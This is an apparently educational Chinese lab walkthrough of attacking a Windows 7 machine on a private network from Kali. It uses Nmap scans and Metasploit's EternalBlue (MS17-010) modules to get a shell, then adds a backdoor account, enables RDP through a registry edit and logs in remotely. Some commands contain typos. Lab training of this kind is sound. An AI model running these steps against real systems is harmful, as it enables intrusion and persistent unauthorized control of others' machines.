- 环境的搭建
1,准备
攻击机kali liunx 系统 ip 192.168.174.129
目标机windows 7系统 ip 192.168.174.128
二,信息收集
- 掌握信息,发现漏洞,便于渗透测试利用
- 主机发现
·Nmap
Ifconfig
日常查看本机ip 192.168.174.129
3,用nmap方法去扫描本机端口
Nmap -sP 192.168.174.0/24 #扫描一个网段
发现多个ip
192.168.174.123
- 端口扫描
查看开放的端口
Nmap -sS 192.168.174.128
查看开放的服务和操作系统
用Nmap -sV 192.168.174.128 #扫描服务
拿到开放的服务
Nmap -O192.168.174.128 #扫描系统
目标系统为windows7系统,总所周知win7系统有个ms17-010(永恒之蓝)的漏洞
还可以用-A直接拿到目标开放服务以及操作系统
- 脚本扫描
先用检查一下本机脚本
locate ms17-010 #查找ms17-010脚本文件
在用nmap来检查目标漏洞
Nmap -sS 192.168.174.128 --scirpt=ms17-101 #利用nmap查找win7的ms17-101漏洞是否存在
好了信息收集确认好,目标且存在ms17-010漏洞就可以开始攻击了
把能收集的信息给他尽量拿到就是信息收集的目的
- 主机渗透
#利用ms17-010漏洞拿到shell
打开msfconsole工具
成功进入,接下来收索一下ms17-010漏洞
#search ms17-010 搜索ms17-010漏洞
先对目标靶机进行扫描进一步确认漏洞是否存在
# use auxiliary/scanner/smb/smb_ms17_010
设置目标ip地址
使用run运行
好了确认漏洞存在就可以攻击了
使用模块
# use exploit/windows/smb/ms17_010_eternalblue
查看选项
# show options
设置参数
# set lhost {ip_local}
set rhost {ip_romote}
尝试进行run或者exploit攻击
成功拿到shell
输出结果可能是一堆乱码
# 输入chcp 65001 可以解决乱码问题
当然有的编码也不算是完全真的解决不过大体上是都能看懂了
接下来就是对目标机进行控制了
1,创建账户
# net user sss 123456 /add
查看一下用户
好啦创建成功
接下来吧用户放进管理员权限组里
2,远程控制桌面
查看一下3389端口是否开启
# netstat -ano
并没有开启,开启3389端口
# REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
再次检查一下
端口也是成功打开了
- 远程连接目标机器桌面
# rdesktop 192.168.174.128:3389
使用之前创建的sss用户登入